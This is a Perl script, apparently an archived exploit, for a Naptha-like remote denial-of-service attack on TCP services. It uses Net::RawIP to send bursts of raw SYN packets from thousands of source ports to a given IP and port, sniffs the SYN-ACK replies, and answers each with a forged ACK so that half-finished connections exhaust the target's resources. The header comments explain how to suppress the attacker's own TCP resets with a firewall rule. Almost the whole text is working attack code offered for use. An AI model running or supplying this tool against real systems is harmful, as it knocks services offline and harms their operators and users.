#Remote DoS by TCP Resource Starvation - NMLabs #Naptha-like #Razor: Security Advisories and Publications #http://razor.bindview.com/publish/advisories/adv_NAPTHA.html #You need to configure your firewall for not send tcp reset. #Example with ipf : block out proto tcp all flags R #!/usr/bin/perl use Net::RawIP qw(:pcap); use Socket; $daddr=$ARGV[0]; $dport=$ARGV[1]; if($#ARGV != 1){ &usage(); } $dev=rdev($daddr); $saddr=${ifaddrlist()}{$dev}; $rule="tcp and src host $daddr and src port $dport"; $sendpacket = new Net::RawIP; $recvpacket = new Net::RawIP; $pcap=$recvpacket->pcapinit($dev,$rule,1500,30); $offset=linkoffset($pcap); srand(); $startport=6666+int(rand(60000)); for($sport=$startport; $sport<($startport+5000); $sport++){ $sendpacket->set({ ip=>{ saddr=>$saddr, daddr=>$daddr, }, tcp=>{ source=>$sport, dest=>$dport, seq=>'-1184816751', ack_seq=>'0', urg=>'0', ack=>'0', psh=>'0', rst=>'0', syn=>'1', fin=>'0', } }); $sendpacket->send(); loop $pcap,1,\&sniffsynack,\@a; } sub usage { print "Usage: \$ perl naptha-like.pl ip port\n"; exit; } sub sniffsynack { $recvpacket->bset(substr($_[2],$offset)); my ($vers,$ihl,$tos,$tot,$id,$frg,$ttl,$pro,$chc,$saddr, $daddr,$sport,$dport,$seq,$aseq,$dof,$res1,$res2,$urg, $ack,$psh,$rst,$syn,$fin,$win,$chk,$data) = $recvpacket->get({ ip=>['version','ihl','tos','tot_len','id','frag_off', 'ttl','protocol','check','saddr','daddr'], tcp=>[ 'source','dest','seq','ack_seq','doff','res1', 'res2','urg','ack','psh','rst','syn','fin', 'window','check','data'] }); if ($pro=~/\S/) { $saddr=inet_ntoa(pack("N",$saddr)); $daddr=inet_ntoa(pack("N",$daddr)); $seq++; $sendpacket->set({ ip=>{ saddr=>$daddr, daddr=>$saddr, }, tcp=>{ source=>$dport, dest=>$sport, seq=>$aseq, ack_seq=>$seq, urg=>'0', ack=>'1', psh=>'0', rst=>'0', syn=>'0', fin=>'0', } }); $sendpacket->send(); } }